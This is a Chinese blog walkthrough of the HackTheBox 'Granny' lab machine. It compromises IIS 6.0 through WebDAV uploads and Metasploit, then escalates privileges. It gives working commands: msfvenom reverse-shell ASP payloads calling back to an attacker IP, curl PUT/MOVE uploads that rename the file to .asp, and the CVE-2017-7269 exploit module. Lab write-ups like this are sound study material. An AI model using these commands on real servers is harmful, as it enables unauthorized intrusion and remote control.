No.55-HackTheBox-windows-Granny-Walkthrough渗透学习

最新推荐文章于 2022-11-17 02:52:47 发布
最新推荐文章于 2022-11-17 02:52:47 发布
阅读量1k 收藏
点赞数
分类专栏: Hack The box 文章标签: linux python java 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34801745/article/details/104335868
版权

**

HackTheBox-windows-Granny-Walkthrough

**

靶机地址:https://www.hackthebox.eu/home/machines/profile/14
靶机难度:容易(3.0/10)
靶机发布日期:2017年10月12日
靶机描述:
Granny, while similar to Grandpa, can be exploited using several different methods. The intended method of solving this machine is the widely-known Webdav upload vulnerability.
作者:大余
时间:2020-02-15
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
可以看到靶机的IP是10.10.10.15,windows系统的靶机…
在这里插入图片描述
1.nmap扫描发现只开了80端口,版本是:Microsoft IIS version 6.0…
2.还启用了http-webdav…
3.还是Windows Server 2003系统…但是不清楚是32还是64位的…
由于我在准备oscp考试,尽量少用MSF内核提权…
访问80web页面:
在这里插入图片描述
可以看到该页面站点还在建设中,还在开发中…

二、提权

方法1:

通过前面获取的信息,这里可以利用Webdav信息进行提权… webdav学习
在这里插入图片描述
命令:curl -I 10.10.10.15
可以看到标头正在使用ASP.NET…
基本的Web开发网站的堆栈结构如下:
LAMP = Linux + Apache + MySQL + PHP
WISA = Windows + IIS + SQL Server + ASP.NET
我进行的靶机是woindows环境,所以可以利用ASP.NET来替代PHP,这里只需要找到一种方法来将文件以asp/aspx扩展名传递到服务器提权即可…(就是将合法文件上传到Web服务器,然后将其重命名为可执行文件,将扩展名更改为asp或aspx)
我来验证下我的思路是不是对的…
在这里插入图片描述
命令:davtest --url http://10.10.10.15
Davtest解释:WebDAV是基于Web服务的扩展服务。它允许用户像操作本地文件一样,操作服务器上的文件。借助该功能,用户很方便的在网络上存储自己的文件。为了方便用户使用,通常会提供给用户较大的文件权限,如上传、修改甚至是执行权限。Kali Linux提供了一款WebDAV服务漏洞利用工具DAVTest。该工具会自动检测权限,寻找可执行文件的权限。一旦发现,用户就可以上传内置的后门工具,对服务器进行控制。同时,该工具可以上传用户指定的文件,便于后期利用。 (理解即可)
可以看到文本文件是成功上传加载的…OK,开始利用!!!
在这里插入图片描述
命令:msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.16 LPORT=4443 -f asp > dayu1.asp
利用msfvenom生成asp shell,然后上传到Web服务器即可…
在这里插入图片描述
将asp内容复制到txt文本中…
在这里插入图片描述
命令:cadaver http://10.10.10.15
cadaver描述:WEBDAV是基于HTTP 1.1的扩展协议,其支持使用PUT方法上传和锁定文件,基于这个特性可以实现功能强大的内容或配置管理系统。但丰富的功能特性总是会带来安全方面的更多隐患,尤其是在配置不当的情况下,可能直接给攻击者留下一个文件上传的入口。davtest是一个文件上传漏洞的检测和验证工具,而cadaver作为一个命令行形式的WEBDAV客户端程序,可以对相应服务器进行任何操作。
可以看到通过put上传文件,然后move重名了文件…即可…
在这里插入图片描述
直接访问即可获得反向外壳…

方法2:

利用curl上传…
在这里插入图片描述
命令:msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f asp > dayu.asp
已经生成dayu.asp…
在这里插入图片描述
命令:

touch dayu.txt    --创建本地txt文件,用于替换asp创建的
cp dayu.asp dayu.txt   --将msfvenom生成的asp内容复制到txt文件中
curl -T 'dayu.txt' http://10.10.10.15/dayu.txt   --上传txt文件到granny服务上
curl -X MOVE --header 'Destination:http://10.10.10.15/dayu.asp' 'http://10.10.10.15/dayu.txt'   --txt改名asp
curl 'http://10.10.10.15/dayu.asp'   ---访问asp文件

可以看到成功获得反向外壳… 参考链接

方法3:

通过前面nmap获得的信息,系统版本是:Microsoft IIS version 6.0,并且启用了webdav…
这里利用MSF查看下可以利用哪些漏洞…
在这里插入图片描述
可以看到这里存在20多个漏洞可利用,不是每个漏洞可以利用的…
1.通过版本6.0,可以知道exploit/windows/iis/iis_webdav_scstoragepathfromurl可以利用…这是CVE-2017-7269…
2.通过版本还可以知道IIS的应该都可以利用:exploit/windows/iis/iis_webdav_upload_asp
在这里插入图片描述
这里我就不展示很多个漏洞利用了,方法都一样…

获得root.txt

在这里插入图片描述
这里可以看到准确的版本…
在这里插入图片描述
我这里利用use post/multi/recon/local_exploit_suggester,这个是Metasploit中使用本地漏洞利用检查来检查系统是否存在本地漏洞…
就和漏扫脚本差不多…很好的一个脚本…
这里发现了7个成功率高的漏洞,都是可以成功的…利用就行…

在这里插入图片描述
可以看到直接利用不成功,需要注入一个进程进行提权…
这里利用post/windows/manage/migrate将meterpreter进程rundll32.exe中…
或者:
在这里插入图片描述
在这里插入图片描述
或者PS查看当前的进程…然后migrate利用PID即可…
在这里插入图片描述

在这里插入图片描述
成功获得user.txt和root.txt…

这里我后面提权用了MSF进行的,很便捷,在oscp考试中虽然不能用,但是我可以通过脚本去识别对方存在哪些漏洞可执行…
还有不适用MSF的方法,直接通过脚本上传到靶机,然后通过脚本进行提权…可以利用smbserver.py开启共享进行上传,然后通过漏洞,这里自己搜索github,方法也有很多…我就不写出来了,加油!!!

由于我们已经成功得到root权限查看user.txt和root.txt,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

大余xiyou
关注
专栏目录
hackthebox-granny(考点:webdav/windows
冬萍子癸水
04-11 745
nmap 就80,上去看看,是个IIS但一片贫瘠,拿dirbuster扫也是一片荒凉 这说明信息搜集还没到位,还要再看看nmap的扫描 下面关于webdav的信息显示了很详细;那说明这应该就是突破口 webdav网上很多介绍。 对于webdav,我一般用这个工具。提示有些类型的文件可以放上去但有些不行。IIS需要的是aspx,但是不能传上去 davtest -url http://10.10....
Hackthebox::Granny walkthrough
Soul Blog
12-26 2001
这是一台hackthebox的简单的windows靶机 信息收集 首先使用nmap进行端口扫描 使用nmap进行粗略的漏洞扫描,发现80端口是可以利用的 查看80端口在web上的内容 查看80端口服务 Microsoft IIS httpd 6.0 是否有什么漏洞 使用msf查看 使用第二个模块windows/iis/iis_webdav_scstoragepathfromurl进行并成功获得一个shell 提权 我们需要提权,返回msf中使用post/multi/.
HackTheBox::Granny
aya3t的博客
10-11 220
HackTheBox::Granny
HacktheboxGranny Walkthrough(not use metasploit)
汗的博客
12-06 1098
预备知识 nikto、nmap、iis6.0的webdav、davtest 信息收集a nmap 10.10.10.15 只开了个80端口,那么还是web,浏览器访问目标机器 直接就是报错页面,迷惑,不过可知服务器是iis 扫了下目录,毫无思路,nmap扫下漏洞 nmap -script=vuln 10.10.10.15 还是没什么发现 nikto 扫一下,这次的信息就多了 nikto -h http://10.10.10.15 + Server: Microsoft-IIS/6.0 + Retrieved
HTB-Granny
yutianovo的博客
01-15 438
http://blog.yutian233.xyz/ 靶机描述 清单 信息搜集 nmap iis 6 获取shell iis_webdav_upload_asp 提权 ms15_051_client_copy_image 信息搜集 靶机IP 端口扫描 nmap 10.10.10.15 -A Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS h
granny-js-client::old_woman:Granny.js-JS API客户端
05-09
来自Granny服务器的客户端库 用于Granny图像交付服务器的库 生态系统 ...cd granny-js-client //if you need browser version npm run build //request to your browser build/index.js //if you need nod
hackthebox-grandpa(考点:iis6.0)不用MSF
冬萍子癸水
04-15 323
这靶机绝大部分人都是msf做的,毕竟适合这个靶机的漏洞文件没多少(还是中国人发现的呢),都是和msf相关,(而且用msf做也很不稳定,这靶机在论坛里也被吐槽),我好不容易找到个非msf的方法 nmap 从名字就可以看出。grandpa老爷爷和granny老奶奶这篇很像,没啥突破口,就是webdav信息多 故地重游 再来扫webdav 但是这次不一样了,都是fail 最后只能网上搜啊搜。。。搜到e...
Hackthebox:Grandpa Walkthrough(not use metasploit)
汗的博客
12-09 271
基本和granny差不多 预备知识 nikto、nmap、iis6.0的webdav windows低权限用户可写的目录 CVE:2017-7269、巴西烤肉(churrasco.exe) 信息收集和获取立足点 先探测端口服务 nmap 10.10.10.14 只开了一个80的http,先浏览器访问一下 只是一个报错页面,nikto探测一下 nikto -h http://10.10.10.14 输出结果,可以看到是iis6.0,而且有DAV还有MicrosoftOfficeWebServer + Ser
HTB靶场系列 Windows靶机 Granny靶机
m0_57221101的博客
01-29 1545
勘探 还是使用nmap进行侦擦 先大致扫描 nmap 10.10.10.15 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-01 10:29 CST Nmap scan report for 10.10.10.15 Host is up (0.38s latency). Not shown: 999 filtered ports PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP a
Maria Breaks the Self-isolation
_C9的博客
05-27 611
Maria is the most active old lady in her house. She was tired of sitting at home. She decided to organize a ceremony against the coronavirus. She hasnnfriends who are also grannies (Maria is not included in this number). Theii-th granny is ready to att...
granny-server-cron::old_woman:Granny.js-Cron职位
05-21
来自Granny图像传送服务的实用程序服务 生态系统 backend-公开了API的后端服务,可以上传和提供/处理图像 client-在nodejs和浏览器中均可使用端库。 使API调用更加轻松使用客户端管理CDN域和设置的前端APP 实用程序 环境变量 #mongo connection string const MONGO = process.env.DEBUG || 'mongodb://localhost/js_cdn' #debug messages const DEBUG = process.env.DEBUG || false 码头工人 docker run -p 3000:3000 --name granny-server-backend \ -e MONGO='mongodb://user@password:example.com/granny' \ as
【Hack The Boxwindows练习-- Omni
人间体佐菲的博客
11-17 1308
【Hack The Boxwindows练习-- Omni
HTB-oscplike-Bastard+Granny
m0_53302733的博客
04-05 1126
HTB-oscplike-Bastard+Granny Bastard medium难度的bastard 靶机IP 10.10.10.9 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.9 80/tcp open http Microsoft IIS httpd 7.5 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Win
hackthebox-Bounty (考点:上传/IIS7.5安全/windows
冬萍子癸水
04-16 458
nmap 就一个80,没啥别的,扫出来显示是iis7.5,说明很可能这就是个突破口&考点 因为是iis,所以对于asp&aspx文件是要重视的,在拿dirbuster扫时也要添加这俩后缀文件名 扫出 打开看第一个是上传,然后在第二个里读取 经验证,随便传图片,读取成功。那么突破思路就是上传了。 但我试了很多php和aspx,都没用,让人郁闷 只好搜iis7.5 rce up...
Metasploit复现 IIS6.0远程溢出漏洞
土豆回锅的博客
01-24 3966
漏洞描述 开启WebDAV服务对IIS 6.0存在缓冲区溢出漏洞都可以导致远程代码执行,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。 漏洞编号 CVE-2017-7269 漏洞等级 高危 影响产品 Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0 漏洞环境搭建 我的环境是windows 20
hack the box(5985 WinRM)
m0_56010012的博客
04-18 2185
nmap参数定义 -v:增加详细级别(基本上输出更多信息)-p-:此标志扫描0-65535范围内的所有TCP端口-sV:尝试确定端口上运行的服务版本-sC:使用默认NSE脚本扫描--min-rate:这用于指定Nmap每秒应发送的最小数据包数;数字越高,扫描速度越快 nmap -v -p- --min-rate 5000 -sV -sC 10.129.136.91 根据Nmap扫描的结果,机器使用Windows作为操作系统,在端口80上运行Apache Web服务器,在端口5985上运行WinR.
WebDav以及IIS上传文件大小限制
weixin_40029679的博客
05-16 7751
点击站点 配置编辑器:下system.web/httpRunTime/maxRequestLength 修改大小既 是以K为单位
No.64-HackTheBox-windows-Bart-Walkthrough渗透学习
qq_34801745的博客
03-12 594
** HackTheBox-windows-Bart-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/128 靶机难度:初级(3.7/10) 靶机发布日期:2017年12月20日 靶机描述: Bart is a fairly realistic machine, mainly focusing on prope...
No.61-HackTheBox-windows-Conceal-Walkthrough渗透学习
qq_34801745的博客
02-26 632
** HackTheBox-windows-Conceal-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/168 靶机难度:中级(5.0/10) 靶机发布日期:2019年5月8日 靶机描述: Conceal is a “hard” difficulty Windows which teaches enumer...
基于pytorch的水果图像识别与分类系统的设计与实现,数据集使用Fruits 360,要求编写转换函数对数据集进行数据增强,模型要实现标准量化和批量归一化,并且实现权重衰减,梯度裁剪和Adam优化,最后将训练好的模型保存下来,并利用该模型实现一个有前后端的分类系统
最新发布
05-12
classes = ['Apple Braeburn', 'Apple Granny Smith', 'Banana', 'Blueberry', 'Cherry', 'Kiwi', 'Lemon', 'Mango', 'Orange', 'Raspberry'] class_name = classes[class_index] return jsonify({'class_name': ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值